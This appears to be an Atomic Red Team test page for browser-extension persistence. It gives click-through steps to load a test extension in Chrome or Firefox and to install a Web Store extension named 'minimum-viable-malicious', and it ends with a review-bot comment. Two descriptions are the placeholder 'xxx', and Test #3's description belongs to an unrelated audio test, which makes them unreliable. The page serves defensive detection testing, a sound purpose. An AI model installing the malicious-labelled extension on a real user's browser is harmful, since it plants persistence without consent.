## Atomic Tests

- [Atomic Test #1 - Chrome (Developer Mode)](#atomic-test-1---chrome-developer-mode)

- [Atomic Test #2 - Chrome (Chrome Web Store)](#atomic-test-2---chrome-chrome-web-store)

- [Atomic Test #3 - Firefox](#atomic-test-3---firefox)


<br/>

## Atomic Test #1 - Chrome (Developer Mode)
xxx

**Supported Platforms:** Linux, Windows, macOS


#### Run it with these steps!
1. Navigate to [chrome://extensions](chrome://extensions) and
tick 'Developer Mode'.

2. Click 'Load unpacked extension...' and navigate to
[Browser_Extension](../t1176/)

3. Click 'Select'


<br/>
<br/>

## Atomic Test #2 - Chrome (Chrome Web Store)
xxx

**Supported Platforms:** Linux, Windows, macOS


#### Run it with these steps!
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome

2. Click 'Add to Chrome'


<br/>
<br/>

## Atomic Test #3 - Firefox
Create a file called test.wma, with the duration of 30 seconds

**Supported Platforms:** Linux, Windows, macOS


#### Run it with these steps!
1. Navigate to [about:debugging](about:debugging) and
click "Load Temporary Add-on"

2. Navigate to [manifest.json](./manifest.json)

3. Then click 'Open'

<br/>
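Review bot: Tests #1 and #2 have `xxx` as their description and Test #3's description ("Create a file called test.wma, with the duration of 30 seconds") is copied from the T1123 audio-capture test, so none of the three says what the extension does once loaded. The step 2 link `[Browser_Extension](../t1176/)` points at a lowercase directory that will not resolve once this lowercase file is removed, and `[manifest.json](./manifest.json)` is relative to the deleted file's own location; both paths need updating in the replacement file. Since Test #2 installs a specific Web Store extension, the description should state what that extension does when added so a tester knows what behaviour to expect and detect.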